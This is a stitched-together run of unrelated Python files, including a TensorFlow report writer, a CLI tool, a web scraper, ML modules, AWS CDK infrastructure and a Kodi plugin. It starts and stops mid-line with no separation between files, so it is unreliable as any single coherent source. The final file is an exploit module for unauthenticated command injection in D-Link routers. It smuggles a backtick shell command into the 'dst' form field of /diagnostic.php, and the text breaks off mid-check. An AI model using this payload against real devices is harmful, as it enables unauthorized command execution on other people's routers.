ValueError( 'consumer_op %s is not in op_to_idx'%consumer_op.name) line += ' %d'%graph_order.op_to_idx[consumer_op.name] line += '\n' self._write_report(line) self._write_report('%s %s\n'%(_MARKER_SECTION_END, _SECTION_NAME_TENSOR_LIST)) def _write_cache_index_map_section(self, tensor_trace_order): """Writes the mapping from cache index to tensor index to the report.""" self._write_report('%s %s\n'%(_MARKER_SECTION_BEGIN, _SECTION_NAME_CACHE_INDEX_MAP)) self._write_report('%s %d\n'%( _FIELD_NAME_NUM_CACHE_INDICES, len(tensor_trace_order.cache_idx_to_tensor_idx))) for cache_idx in range(0, len(tensor_trace_order.cache_idx_to_tensor_idx)): tensor_idx = tensor_trace_order.cache_idx_to_tensor_idx[cache_idx] line = '%d %d\n'%(cache_idx, tensor_idx) self._write_report(line) self._write_report('%s %s\n'%(_MARKER_SECTION_END, _SECTION_NAME_CACHE_INDEX_MAP)) def _write_graph_section(self, graph_order): """Writes the graph section of the report.""" self._write_report('%s %s\n'%(_MARKER_SECTION_BEGIN, _SECTION_NAME_GRAPH)) self._write_report('%s %s\n'%(_FIELD_NAME_TOPOLOGICAL_SORT_SUCCEED, not graph_order.contains_cycle)) l = list(graph_order.topological_order_or_cycle) for i in range(0, len(l)): self._write_report('%d "%s"\n'%(i, l[i].name)) self._write_report('%s %s\n'%(_MARKER_SECTION_END, _SECTION_NAME_GRAPH)) 1-10 """Module to read user input and perform the requested input action.""" import argparse import logging import sys import tempfile from pathlib import Path from typing import Tuple import pkg_resources import yaml from .actions import (add_jobs, compute_jobs, login_insilico, manage_jobs, query_properties, 
report_properties) from .input_validation import DEFAULT_WEB, validate_input from .utils import Options, exists logger = logging.getLogger(__name__) VERSION = pkg_resources.get_distribution('ceibacli').version def configure_logger(workdir: Path) -> None: """Set the logging infrasctucture.""" file_log = workdir / 'ceibacli_output.log' logging.basicConfig(filename=file_log, level=logging.INFO, format='%(asctime)s %(message)s', datefmt='[%I:%M:%S]') handler = logging.StreamHandler() handler.terminator = "" path = pkg_resources.resource_filename('ceibacli', '') logger.info(f"\nUsing ceibacli version: {VERSION}\n") logger.info(f"ceibacli path is: {path}\n") logger.info(f"Working directory is: {workdir.absolute().as_posix()}\n") def parse_user_arguments() -> Tuple[str, Options]: """Read the user arguments.""" parser = argparse.ArgumentParser("ceibacli") parser.add_argument('--version', action='version', version=f"%(prog)s {VERSION}") subparsers = parser.add_subparsers( help="Interact with the properties web service", dest="command") # input file parser input_parser = argparse.ArgumentParser(add_help=False) input_parser.add_argument("-i", "--input", type=exists, help="Yaml input file") # Command line arguments share common_parser = argparse.ArgumentParser(add_help=False) common_parser.add_argument("-w", "--web", default=DEFAULT_WEB, help="Web Service URL") common_parser.add_argument("-c", "--collection_name", help="Collection name") # Login into the web service login_parser = subparsers.add_parser("login", help="Log in to the Insilico web service") login_parser.add_argument("-w", "--web", default=DEFAULT_WEB, help="Web Service URL") login_parser.add_argument("-t", "--token", required=True, help="GitHub access Token") # Add new Job to the database add_parser = subparsers.add_parser( "add", help="Add new jobs to the database", parents=[common_parser]) add_parser.add_argument("-j", "--jobs", required=True, help="JSON file with the jobs to add") # Request new jobs to run from the database subparsers.add_parser("compute", help="Compute available jobs", parents=[input_parser]) # Report properties to the database subparsers.add_parser("report", help="Report the results back to the server", parents=[input_parser, common_parser]) # Request data from the database query_parser = subparsers.add_parser( "query", help="Query some properties from the database", parents=[common_parser]) # Manage the Jobs status subparsers.add_parser( "manage", help="Change jobs status", parents=[input_parser]) # Read the arguments args = parser.parse_args() if args.command is None: parser.print_help() sys.exit() return args.command, handle_input(args) def handle_input(args: argparse.Namespace) -> Options: """Check user input.""" input_file = getattr(args, "input", None) if input_file is None: user_input = {key: value for key, value in vars(args).items() if key not in {"command", "input"}} input_file = Path(tempfile.gettempdir()) / "user_input.yml" with open(input_file, 'w') as handler: yaml.dump(user_input, handler) return validate_input(input_file, action=args.command) def main(): """Parse the command line arguments to compute or query data from the database.""" command, opts = parse_user_arguments() # Initialize logger configure_logger(Path(".")) if command == "query": logger.info("QUERYING MOLECULAR PROPERTIES!") query_properties(opts) elif command == "compute": logger.info("COMPUTING PROPERTIES!") compute_jobs(opts) elif command == "report": logger.info("REPORTING RESULTS BACK TO THE SERVER!") report_properties(opts) elif 
command == "add": logger.info("ADDING NEW JOBS TO THE DATABASE") add_jobs(opts) elif command == "manage": logger.info("MANAGE JOBS STATE!") manage_jobs(opts) elif command == "login": logger.info("LOGGING INTO THE INSILICO WEB SERVICE!") login_insilico(opts) if __name__ == "__main__": main() import inspect from typing import Callable from app.adapters import orm, redis_event_publisher from app.service_layer import unit_of_work def bootstrap( start_orm: bool = True, uow: unit_of_work.UnitOfWork = unit_of_work.SQLAlchemyUnitOfWork(), ) -> unit_of_work.UnitOfWork: if start_orm: orm.start_mappers() return uow taotao-cloud-python/taotao-cloud-oldboy/day77-cmdb/cmdb/AutoCmdb/web/urls.py from django.conf.urls import url from django.conf.urls import include from django.contrib import admin from web.views import account from web.views import home from web.views import asset from web.views import user urlpatterns = [ url(r'^login.html$', account.LoginView.as_view()), url(r'^logout.html$', account.LogoutView.as_view()), url(r'^index.html$', home.IndexView.as_view()), url(r'^cmdb.html$', home.CmdbView.as_view()), url(r'^asset.html$', asset.AssetListView.as_view()), url(r'^assets.html$', asset.AssetJsonView.as_view()), url(r'^asset-(?P\d+)-(?P\d+).html$', asset.AssetDetailView.as_view()), url(r'^add-asset.html$', asset.AddAssetView.as_view()), url(r'^users.html$', user.UserListView.as_view()), url(r'^user.html$', user.UserJsonView.as_view()), url(r'^chart-(?P\w+).html$', home.ChartView.as_view()), ] howawong/hong_kong_itf_crawlerscraper.py import requests import json from lxml import html from multiprocessing import Pool import signal def init_worker(): signal.signal(signal.SIGINT, signal.SIG_IGN) def get_page_links(text): root = html.fromstring(text) links = root.xpath("//table[@id=\"tblPrjSummary\"]/tr[@class=\"prjSearchResult\"]/td[@class=\"tdPrjRef\"]/a/@href") return ["http://www.itf.gov.hk/l-eng/" + link for link in links] def get_page_detail(pair): link, cookies = pair detail_response = requests.get(link, cookies=cookies) root = html.fromstring(detail_response.text) sels = root.xpath("//table[@id=\"tblPrjProfile\"]/tr") count = len(sels) d = {} if count > 0: for sel in sels: key = "" for text in sel.xpath("td[@class=\"prjProfile1\"]//text()"): key = key + text key = key.strip() value = "" values = [v.strip() for v in sel.xpath("td[@class=\"prjProfile2\"]//text()")] value = "".join(values).strip() d[key] = value return d else: print "fucked %s "% (response.meta['title']) raise Exception("No record found") url = "http://www.itf.gov.hk/l-eng/Prj_Search.asp?code=108" response = requests.get(url) root = html.fromstring(response.text) token = root.xpath("//input[@name=\"token\"]/@value")[0] print token print response.cookies options = root.xpath("//select[@id=\"techArea\"]/option") output = {} for option in options: category = option.xpath("text()")[0] value = option.xpath("@value")[0] print category + " [" + value + "]" formdata = {"techArea": value, 'token': token, 'submit': 'Search'} page_response = requests.post('http://www.itf.gov.hk/l-eng/Prj_SearchResult.asp', data=formdata, cookies=response.cookies) root = html.fromstring(page_response.text) total_pages = int("".join([x.strip() for x in root.xpath("//table[@id=\"prjSearchPageTable\"]//tr[@class=\"prjSearchResult\"]/td//text()")]).split(" of ")[1].strip()) details = [] for i in range(1, total_pages + 1): print "Page:%d" % (i) formdata = {"techArea": value, 'token': token, 'submit': 'Search', 'page_no': str(i)} page_response = 
requests.post('http://www.itf.gov.hk/l-eng/Prj_SearchResult.asp', data=formdata, cookies=response.cookies) links = get_page_links(page_response.text) p = Pool(10, init_worker) try: details_per_page = p.map(get_page_detail, [(link, response.cookies) for link in links]) for detail in details_per_page: print json.dumps(detail) details = details + details_per_page except KeyboardInterrupt: p.terminate() p.join() finally: p.close() print "Number of Projects %d" % (len(details)) output[category] = details print "Writing File..." f = open("projects_uncleansed.json", "w") f.write(json.dumps(output)) f.close() filterflow/transition/linear.py import tensorflow as tf import tensorflow_probability as tfp from filterflow.base import State from filterflow.transition.base import TransitionModelBase class LinearTransitionModel1d(TransitionModelBase): def __init__(self, scalar: tf.Tensor, add_term: tf.Tensor, noise: tfp.distributions.Distribution, name='RandomWalkModel'): super(LinearTransitionModel1d, self).__init__(name=name) self._scalar = scalar self._add_term = add_term self._noise = noise def push_particles(self, particles): pushed_particles = self._scalar * particles pushed_particles = pushed_particles + self._add_term return pushed_particles def loglikelihood(self, prior_state: State, proposed_state: State, inputs: tf.Tensor): """Computes the loglikelihood of an observation given proposed particles :param prior_state: State State at t-1 :param proposed_state: State Some proposed State for which we want the likelihood given previous state :param inputs: tf.Tensor Input for transition model :return: a tensor of loglikelihoods for all particles in proposed state :rtype: tf.Tensor """ batch_size, n_particles, dim = prior_state.particles.shape pushed_particles = self.push_particles(prior_state.particles) diff = proposed_state.particles - pushed_particles log_prob = self._noise.log_prob(diff) return tf.reshape(log_prob, [batch_size, n_particles]) def sample(self, state: State, inputs: tf.Tensor, seed=None): """Samples a new proposed state conditionally on prior state and some inputs :param state: State State of the filter at t-1 :param inputs: tf.Tensor Input for transition model :param seed: tf.Tensor Seed :return: proposed State :rtype: State """ pushed_particles = self.push_particles(state.particles) res = pushed_particles + self._noise.sample([state.batch_size, state.n_particles], seed=seed) return res class LinearTransitionModel(TransitionModelBase): def __init__(self, scalar_matrix: tf.Tensor, add_term: tf.Tensor, noise: tfp.distributions.Distribution, name='RandomWalkModel'): super(LinearTransitionModel, self).__init__(name=name) self._scalar_matrix = scalar_matrix self._add_term = add_term self._noise = noise def push_particles(self, particles): pushed_particles = tf.linalg.matvec(self._scalar_matrix, particles) pushed_particles = pushed_particles + self._add_term return pushed_particles def loglikelihood(self, prior_state: State, proposed_state: State, inputs: tf.Tensor): """Computes the loglikelihood of an observation given proposed particles :param prior_state: State State at t-1 :param proposed_state: State Some proposed State for which we want the likelihood given previous state :param inputs: tf.Tensor Input for transition model :return: a tensor of loglikelihoods for all particles in proposed state :rtype: tf.Tensor """ pushed_particles = self.push_particles(prior_state.particles) diff = proposed_state.particles - pushed_particles return self._noise.log_prob(diff) def sample(self, state: 
State, inputs: tf.Tensor): """Samples a new proposed state conditionally on prior state and some inputs :param state: State State of the filter at t-1 :param inputs: tf.Tensor Input for transition model :return: proposed State :rtype: State """ pushed_particles = self.push_particles(state.particles) res = pushed_particles + self._noise.sample([state.batch_size, state.n_particles]) return res import os.path from aws_cdk.aws_s3_assets import Asset from aws_cdk import ( aws_ec2 as ec2, aws_iam as iam, core ) dirname = os.path.dirname(__file__) class LoadGenStack(core.Stack): def __init__(self, scope: core.Construct, id: str, vpc, **kwargs) -> None: super().__init__(scope, id, **kwargs) amzn_linux = ec2.MachineImage.latest_amazon_linux( generation=ec2.AmazonLinuxGeneration.AMAZON_LINUX_2, edition=ec2.AmazonLinuxEdition.STANDARD, virtualization=ec2.AmazonLinuxVirt.HVM, storage=ec2.AmazonLinuxStorage.GENERAL_PURPOSE ) # Allow to be managed via SSM role = iam.Role(self, "InstanceSSM", assumed_by=iam.ServicePrincipal("ec2.amazonaws.com")) role.add_managed_policy(iam.ManagedPolicy.from_aws_managed_policy_name("service-role/AmazonEC2RoleforSSM")) ## Setup key_name for EC2 instance login if you don't use Session Manager ## Create keypair in AWS console ## Change .any_ipv4 to a specific IP address/range to reduce attack surface #key_name = "{keypair}" #loadgen.allow_ssh_access_from(ec2.Peer.any_ipv4()) #loadgen.allow_ssh_access_from(ec2.Peer.ipv4('10.44.0.0/24')) #loadgen.instance.instance.add_property_override("KeyName", key_name) mySecurityGroup = ec2.SecurityGroup( self, 'Loadgen SecurityGroup', vpc=vpc, security_group_name="loadgen-ssh-access-sg", description= 'Allow ssh access to ec2 instances from anywhere', allow_all_outbound=True ) loadgen = ec2.Instance( self, id="LoadGen", vpc=vpc, instance_name="LoadGen", instance_type=ec2.InstanceType("m5.xlarge"), machine_image=amzn_linux, role = role, security_group = mySecurityGroup ) # We use session manager, but if you want to deploy an ssh key as above, you will need to open up ssh #mySecurityGroup.add_ingress_rule(ec2.Peer.any_ipv4(), ec2.Port.tcp(22), 'allow public ssh access') asset = Asset(self, "Asset", path=os.path.join(dirname, "assets/load_deploy.sh")) local_path = loadgen.user_data.add_s3_download_command( bucket=asset.bucket, bucket_key=asset.s3_object_key ) loadgen.user_data.add_execute_file_command(file_path=local_path) asset.grant_read(loadgen.role) ec2.CfnEIP(self, id="LoadGenHostEIP", domain="vpc", instance_id=loadgen.instance_id) core.CfnOutput( self, id="LoadGenPrivateIP", value=loadgen.instance_private_ip, description="LOADGEN Private IP", export_name=f"{self.region}:{self.account}:{self.stack_name}:loadgen-private-ip" ) core.CfnOutput( self, id="LoadgenPublicIP", value=loadgen.instance_public_ip, description="LOADGEN Public IP", export_name=f"{self.region}:{self.account}:{self.stack_name}:loadgen-public-ip" ) Sword-holder/deepmatcher import six import deepmatcher as dm import torch import torch.nn as nn from torch.autograd import Variable from . import _utils from ..batch import AttrTensor class RNN(dm.modules.RNN, dm.WordContextualizer): """Multi layered RNN based Word Contextualizer. Supports dropout and residual / highway connections. Takes the same parameters as the :class:`~deepmatcher.modules.RNN` module. 
""" pass # class CNN(dm.WordContextualizer): # pass class SelfAttention(dm.WordContextualizer): """__init__(heads=1, hidden_size=None, input_dropout=0, alignment_network='decomposable', scale=False, score_dropout=0, value_transform_network=None, value_merge='concat', transform_dropout=0, output_transform_network=None, output_dropout=0, bypass_network='highway', input_size=None) Self Attention based Word Contextualizer. Supports `vanilla self attention `__ and `multi-head self attention `__. Args: heads (int): Number of attention heads to use. Defaults to 1. hidden_size (int): The default hidden size of the `alignment_network` and transform networks, if they are not disabled. input_dropout (float): If non-zero, applies dropout to the input to this module. Dropout probability must be between 0 and 1. alignment_network (string or :class:`deepmatcher.modules.AlignmentNetwork` or callable): The neural network takes the input sequence, aligns the words in the sequence with other words in the sequence, and returns the corresponding alignment score matrix. Argument must specify a :ref:`align-op` operation. scale (bool): Whether to scale the alignment scores by the square root of the `hidden_size` parameter. Based on `scaled dot-product attention `__ score_dropout (float): If non-zero, applies dropout to the alignment score matrix. Dropout probability must be between 0 and 1. value_transform_network (string or :class:`~deepmatcher.modules.Transform` or callable): For each word embedding in the input sequence, SelfAttention takes a weighted average of the aligning values, i.e., the aligning word embeddings based on the alignment scores. This parameter specifies the neural network to transform the values (word embeddings) before taking the weighted average. Argument must be None or specify a :ref:`transform-op` operation. If the argument is a string, the hidden size of the transform operation is computed as :code:`hidden_size // heads`. If argument is None, and `heads` is 1, then the values are not transformed. If argument is None and `heads` is > 1, then a 1 layer highway network without any non-linearity is used. The hidden size for this is computed as mentioned above. value_merge (string or :class:`~deepmatcher.modules.Merge` or callable): For each word embedding in the input sequence, each SelfAttention head produces one corresponding vector as output. This parameter specifies how to merge the outputs of all attention heads for each word embedding. Concatenates the outputs of all heads by default. Argument must specify a :ref:`merge-op` operation. transform_dropout (float): If non-zero, applies dropout to the output of the `value_transform_network`, if applicable. Dropout probability must be between 0 and 1. output_transform_network (string or :class:`~deepmatcher.modules.Transform` or callable): For each word embedding in the input sequence, SelfAttention produces one corresponding vector as output. This neural network specifies how to transform each of these output vectors to obtain a hidden representation of size `hidden_size`. Argument must be None or specify a :ref:`transform-op` operation. If argument is None, and `heads` is 1, then the output vectors are not transformed. If argument is None and `heads` is > 1, then a 1 layer highway network without any non-linearity is used. output_dropout (float): If non-zero, applies dropout to the output of the `output_transform_network`, if applicable. Dropout probability must be between 0 and 1. 
bypass_network (string or :class:`Bypass` or callable): The bypass network (e.g. residual or highway network) to use. The input word embedding sequence to this module is considered as the raw input to the bypass network and the final output vector sequence (output of `value_merge` or `output_transform_network` if applicable) is considered as the transformed input. Argument must specify a :ref:`bypass-op` operation. If None, does not use a bypass network. input_size (int): The number of features in the input to the module. This parameter will be automatically specified by :class:`LazyModule`. """ def _init(self, heads=1, hidden_size=None, input_dropout=0, alignment_network='decomposable', scale=False, score_dropout=0, value_transform_network=None, value_merge='concat', transform_dropout=0, output_transform_network=None, output_dropout=0, bypass_network='highway', input_size=None): hidden_size = hidden_size if hidden_size is not None else input_size self.alignment_networks = nn.ModuleList() for head in range(heads): self.alignment_networks.append( dm.modules._alignment_module(alignment_network, hidden_size)) if value_transform_network is None and heads > 1: value_transform_network = dm.modules.Transform( '1-layer-highway', non_linearity=None, hidden_size=hidden_size // heads) self.value_transform_network = dm.modules._transform_module( value_transform_network, hidden_size // heads) self.value_merge = dm.modules._merge_module(value_merge) self.softmax = nn.Softmax(dim=2) if output_transform_network is None and heads > 1: output_transform_network = dm.modules.Transform( '1-layer-highway', non_linearity=None, hidden_size=hidden_size) self.output_transform_network = dm.modules._transform_module( output_transform_network, hidden_size) self.input_dropout = nn.Dropout(input_dropout) self.transform_dropout = nn.Dropout(transform_dropout) self.score_dropout = nn.Dropout(output_dropout) self.output_dropout = nn.Dropout(output_dropout) self.bypass_network = dm.modules._bypass_module(bypass_network) self.heads = heads self.scale = scale self.hidden_size = hidden_size def _forward(self, input_with_meta): input = self.input_dropout(input_with_meta.data) values_aligned = [] for head in range(self.heads): # Dims: batch x len1 x len2 alignment_scores = self.score_dropout(self.alignment_networks[head](input, input)) if self.scale: alignment_scores = alignment_scores / torch.sqrt(self.hidden_size) if input_with_meta.lengths is not None: mask = _utils.sequence_mask(input_with_meta.lengths) mask = mask.unsqueeze(1) # Make it broadcastable. 
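                # `mask` marks the real (non-padding) token positions in each
                # sequence; filling the remaining positions with -inf below makes
                # the softmax over dim 2 assign them effectively zero attention weight.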
alignment_scores.data.masked_fill_(~mask, -float('inf')) normalized_scores = self.softmax(alignment_scores) if self.value_transform_network is not None: values_transformed = self.transform_dropout( self.value_transform_network(input)) else: values_transformed = input # Dims: batch x len1 x channels values_aligned.append(torch.bmm(normalized_scores, values_transformed)) values_merged = self.value_merge(*values_aligned) output = values_merged if self.output_transform_network: output = self.output_transform_network(output) output = self.output_dropout(output) final_output = self.bypass_network(output, input) return AttrTensor.from_old_metadata(final_output, input_with_meta) 0 from scrapy.crawler import CrawlerProcess from crawler.spiders.eu_data_spider import EuDataSpiderSpider process = CrawlerProcess({ 'USER_AGENT': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)', 'FEED_FORMAT': 'json', 'FEED_URI': '../../data/01_crawled/eu_data/metadata.json' }) process.crawl(EuDataSpiderSpider, output_directory='../../data/01_crawled/eu_data/text/', path_to_file='../../data/00_raw/extracted/eu_data_preprocessed.csv') process.start()""" Certificate Generator - Generate thousands of certificates at just one click Author : Date : 28/03/21 """ from PIL import Image, ImageDraw, ImageFont import os import csv # font for name on certificate font = ImageFont.truetype('merriweather-italic.ttf', 100) # open csv file containing name with open('names.csv') as names_file: names = csv.reader(names_file) # iterate over names for name in names: # open certificate image image = Image.open('certificate.jpg') draw = ImageDraw.Draw(image) # find dimensions of text on certificate width_of_text, height_of_text = draw.textsize(name[0], font) # find x coordinate of starting point of text such that it is horizontally centered x_coordinate = (image.width - width_of_text) / 2 # draw the text on certificate draw.text((x_coordinate, 625), name[0], font=font, fill=(255, 255, 255)) # if Output dir does not exist then create it if not os.path.exists('./Output'): os.mkdir('./Output') # save edited image in Output dir image.save("Output/{0}.jpg".format(name[0])) #!/usr/bin/env python # -*- coding: utf-8 -*- """Testing suite for SkewStudent class. 
""" from __future__ import print_function, division import unittest as ut import numpy as np from scipy.stats import t from skewstudent import SkewStudent __author__ = "" __email__ = "" class SkewStudentTestCase(ut.TestCase): """Test SkewStudent distribution class.""" def test_init(self): """Test __init__.""" skewt = SkewStudent() self.assertIsInstance(skewt.eta, float) self.assertIsInstance(skewt.lam, float) eta, lam = 5., -.2 skewt = SkewStudent(eta=eta, lam=lam) self.assertEqual(skewt.eta, eta) self.assertEqual(skewt.lam, lam) def test_pdf(self): """Test pdf method.""" skewt = SkewStudent() num = 50 arg = np.linspace(-1, 1, num) pdf = skewt.pdf(arg) self.assertEqual(pdf.shape[0], num) self.assertIsInstance(skewt.pdf(0), float) def test_cdf(self): """Test cdf method.""" skewt = SkewStudent() num = 50 arg = np.linspace(-1, 1, num) cdf = skewt.cdf(arg) self.assertEqual(cdf.shape[0], num) self.assertIsInstance(skewt.cdf(0), float) def test_ppf(self): """Test ppf method.""" skewt = SkewStudent() num = 50 arg = np.linspace(.01, .99, num) ppf = skewt.ppf(arg) self.assertEqual(ppf.shape[0], num) self.assertIsInstance(skewt.ppf(.5), float) def test_rvs(self): """Test ppf method.""" skewt = SkewStudent() rvs = skewt.rvs() self.assertIsInstance(rvs, float) size = 2 rvs = skewt.rvs(size=size) self.assertIsInstance(rvs, np.ndarray) self.assertEqual(rvs.shape, (size, )) size = (2, 3) rvs = skewt.rvs(size=size) self.assertIsInstance(rvs, np.ndarray) self.assertEqual(rvs.shape, size) def test_compare_with_t(self): """Compare with standard t distribution.""" eta = 5 skewt = SkewStudent(eta=eta, lam=0) scale = 1/(eta/(eta-2))**.5 standt = t(eta, scale=scale) arg = np.linspace(-2, 2, 100) np.testing.assert_array_almost_equal(skewt.pdf(arg), standt.pdf(arg)) np.testing.assert_array_almost_equal(skewt.cdf(arg), standt.cdf(arg)) arg = np.linspace(.01, .99, 100) np.testing.assert_array_almost_equal(skewt.ppf(arg), standt.ppf(arg)) if __name__ == '__main__': ut.main() #!/usr/bin/env python3 # -*- coding:utf-8 -*- # ----------- # SPDX-License-Identifier: MIT # Copyright (c) 2021 # uuid = f6792b10-b7f5-11eb-89b8-59b62252b88f # author = # email = # date = 2021-05-18 # ----------- """ """ # ------------ # System Modules - Included with Python import sys import logging import math # ------------ # 3rd Party - From pip import click # ------------ # Custom Modules from .common import run_cmd, read_json # ------------ # Custom Modules # ------------- # Logging log = logging.getLogger(__name__) # ------------- def move_window(wid, x, y, w, h, title, verbose=False): """ Move the window specified by is (wid) to the new x, y offset and the new width (w) and height (h) $ wmctrl -ir {wid} -e 0,{x},{y},{w},{h} # Parameters wid:str - The id of the window to move x:int - x-coordinate of the upper left corner y:int - y-coordinate of the upper left corner w:int - width of the window h:int - height of the window title:str - The title information of the window verbose:bool - used to indicate we want more verbose information """ if verbose: log.info(f'wmctrl -ir {wid} -e 0,{x},{y},{w},{h} " -> {title}"') # restore the correct size and position on the desktop results = run_cmd( [ "wmctrl", "-ir", wid, "-e", f"0,{x},{y},{w},{h}", ] ) for r in results: log.info(r) def set_desktop(wid, deskid, title, verbose=False): """ Given the window (wid) move it to the virtual desktop (deskid) $ wmctrl -ir {wid} -t {deskid} # Parameters wid:str - The id of the window to move title:str - The title information of the window verbose:bool - used to 
indicate we want more verbose information """ if verbose: log.info(f'wmctrl -ir {wid} -t {deskid} " -> {title}"') results = run_cmd( [ "wmctrl", "-ir", wid, "-t", deskid, ] ) for r in results: log.info(r) def position_adjustments(x, y, fine_tuning, title): """ Given the window x,y corner offset and the window title, determine if the coordinates need to be adjusted. # Parameters x:int - x-coordinate of the upper left corner y:int - y-coordinate of the upper left corner fine_tuning:dict - title:str - The title information of the window """ if "window_adjustments" in fine_tuning: for adjustment in fine_tuning["window_adjustments"]: if adjustment["title_text"] in title: return ( x + adjustment["x"], y + adjustment["y"], ) return ( math.floor(x * fine_tuning["scale_x"]), math.floor(y * fine_tuning["scale_y"]), ) @click.command("restore") @click.option("--verbose", is_flag=True, help="Display more verbose output.") @click.pass_context def restore(*args, **kwargs): """ # Usage """ # Extract the configuration file from the click context paths = args[0].obj["paths"] positions_fine_tuning = paths["settings"] items = read_json(paths["locations"]) if items is None: log.info("Nothing to restore!") return # ---------------------- # JSON data structure # [ # "0x02600008", # Window ID (Hex) # "2", # Desktop number # "70", # x-offset # "460", # y-offset # "940", # width # "500", # height # "vidar", # "\ud83c\udfe1-parents-only", # "-", # "Discord" # ] for p in items: wid, deskid, x, y, w, h, *title = p title = " ".join(title) x, y = position_adjustments(int(x), int(y), positions_fine_tuning, title) # -------------- # 1. move to the correct position on the active desktop move_window(wid, x, y, w, h, title, verbose=kwargs["verbose"]) # -------------- # 2. move to the correct desktop once it is in the correct position set_desktop(wid, deskid, title, verbose=kwargs["verbose"]) # We are going to use `$ wmctrl -ir wid -e 0,x,y,w,h` to restore the window position # ------------ # -i # Interpret window arguments () as a numeric value rather than a string name for the window. If the nu‐ # meric value starts with the prefix '0x' it is assumed to be a hexadecimal number. # -r # Specify a target window for an action. # -e # Resize and move a window that has been specified with a -r action according to the argument. # # A move and resize argument has the format 'g,x,y,w,h'. All five components are integers. The first value, g, # is the gravity of the window, with 0 being the most common value (the default value for the window). Please # see the EWMH specification for other values. # The four remaining values are a standard geometry specification: x,y is the position of the top left corner # of the window, and w,h is the width and height of the window, with the exception that the value of -1 in any # position is interpreted to mean that the current geometry value should not be modified. # ------------ from channels import route from TEST.consumers import ws_connect, ws_receive, ws_disconnect # There's no path matching on these routes; we just rely on the matching # from the top-level routing. We _could_ path match here if we wanted. 
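# Each route() below binds one Channels event type ("websocket.connect",
# "websocket.receive", "websocket.disconnect") to its consumer; the shared
# `path` regex keeps these handlers scoped to URLs under /live/.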
websocket_routing = [ # Called when WebSockets connect route("websocket.connect", ws_connect, path=r'^/live/(?P[^/]+)/(?P[^/]+)/$'), # Called when WebSockets get sent a data frame route("websocket.receive", ws_receive, path=r'^/live/(?P[^/]+)/(?P[^/]+)/$'), # Called when WebSockets disconnect route("websocket.disconnect", ws_disconnect, path=r'^/live/(?P[^/]+)/(?P[^/]+)/$'), ] custom_routing = [ # Handling different chat commands (websocket.receive is decoded and put # onto this channel) - routed on the "command" attribute of the decoded # message. ]script.module.fantastic/lib/resources/lib/sources/en/123hulu.py1-10 ''' fantastic Add-on Copyright (C) 2016 fantastic This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . ''' import re import urllib import urlparse import json import base64 from resources.lib.modules import client, cleantitle, directstream, dom_parser2 class source: def __init__(self): ''' Constructor defines instances variables ''' self.priority = 1 self.language = ['en'] self.domains = ['123hulu.com'] self.base_link = 'http://123hulu.com' self.movies_search_path = ('search-movies/%s.html') def movie(self, imdb, title, localtitle, aliases, year): try: clean_title = cleantitle.geturl(title).replace('-','+') url = urlparse.urljoin(self.base_link, (self.movies_search_path % clean_title)) r = client.request(url) r = dom_parser2.parse_dom(r, 'div', {'id': 'movie-featured'}) r = [dom_parser2.parse_dom(i, 'a', req=['href']) for i in r if i] r = [(i[0].attrs['href'], re.search('Release:\s*(\d+)', i[0].content)) for i in r if i] r = [(i[0], i[1].groups()[0]) for i in r if i[0] and i[1]] r = [(i[0], i[1]) for i in r if i[1] == year] if r[0]: url = r[0][0] return url else: return except Exception: return def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year): return def episode(self, url, imdb, tvdb, title, premiered, season, episode): return def sources(self, url, hostDict, hostprDict): try: sources = [] r = client.request(url) r = dom_parser2.parse_dom(r, 'p', {'class': 'server_play'}) r = [dom_parser2.parse_dom(i, 'a', req=['href']) for i in r if i] r = [(i[0].attrs['href'], re.search('/(\w+).html', i[0].attrs['href'])) for i in r if i] r = [(i[0], i[1].groups()[0]) for i in r if i[0] and i[1]] for i in r: try: host = i[1] if str(host) in str(hostDict): host = client.replaceHTMLCodes(host) host = host.encode('utf-8') sources.append({ 'source': host, 'quality': 'SD', 'language': 'en', 'url': i[0].replace('\/','/'), 'direct': False, 'debridonly': False }) except: pass return sources except Exception: return def resolve(self, url): try: r = client.request(url) url = re.findall('document.write.+?"([^"]*)', r)[0] url = base64.b64decode(url) url = re.findall('src="([^"]*)', url)[0] return url except Exception: return src/app.py0 from flask import Flask, request from src.measuring.postProcessMeasuring import PostProcessMeasuring from src.prediction.predictionWrapper import PredictionWrapper from src.utilities.errorFunctions import imagesMeanSquareError from 
src.utilities.errorFunctions import trueSkillStatistic app = Flask(__name__) import platform print(platform.python_version()) @app.route("/last-prediction") def last_prediction(): with open('last-prediction.json', 'r') as content_file: content = content_file.read() return content @app.route("/predict") def predict(): print('Prediction Start') result = PredictionWrapper.predict() return result @app.route("/predict-historical") def predict_historical(): date = request.args['date'] result = PredictionWrapper.predict(date) return result @app.route("/accuracy") def get_accuracy(): files = request.args.getlist('files') error_fun = request.args['error'] measuring = PostProcessMeasuring().set_files(files) if error_fun == 'mse': measuring.set_error_function(imagesMeanSquareError.ImagesMeanSquareError()) if error_fun == 'hk': measuring.set_error_function(trueSkillStatistic.TrueSkillStatistic()) return measuring.evaluate()misc/vulnpwn/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.py #!/usr/bin/python # -*- coding: utf-8 -*- ## # Current source: https://github.com/open-security/vulnpwn/ ## from lib.core import exploit import requests class Module(exploit.Exploit): __info__ = { 'name': 'Multiple Vulnerabilities in D-Link devices', 'author': ['Open-Security'], 'description': """ The vulnerability is caused by missing input validation in the dst parameter and missing session validation and can be exploited to inject and execute arbitrary shell commands. """, 'references': ['http://www.s3cur1ty.de/m1adv2013-017'], 'license': 'APACHE_LICENSE', 'disclosureDate': 'May 07 2013', 'options': { 'RHOST': ['192.168.1.1', 'the target host'], 'RPORT': [80, 'the target port'], 'TARGETURI': ['/diagnostic.php', 'target uri to request'] } } def __init__(self): exploit.Exploit.__init__(self) def check(self): cmd = 'act=ping&dst=`date -us "1991-11-11 11:11:11"' uri = 'http://{}:{}{}'.format( self.rhost, self.rport, self.get_option_value('TARGETURI')) self.output('Exploiting - {}'.format(uri)) headers = {'User-Agent': 'Mozilla/5.0 Gecko/20100101 Firefox/24.0', 'Content-Type': 'application/x-www-form-urlencoded'} sess = requests.Session() resp = sess.post(uri, headers=headers, data=cmd) if resp and resp.status_code == 200 and resp.headers and 